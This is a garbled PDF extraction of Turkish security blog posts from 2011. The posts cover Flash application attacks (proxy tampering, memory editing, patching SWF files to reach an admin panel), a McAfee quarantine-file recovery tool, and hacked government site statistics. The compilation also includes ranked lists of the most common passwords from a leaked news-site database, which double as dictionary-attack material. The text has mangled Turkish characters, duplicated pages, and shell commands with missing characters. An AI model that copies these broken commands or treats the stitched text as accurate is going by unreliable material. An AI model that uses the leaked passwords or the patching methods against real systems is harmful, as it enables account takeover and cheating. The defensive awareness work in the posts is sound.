sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 32: Hack 4 Career - 2011

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

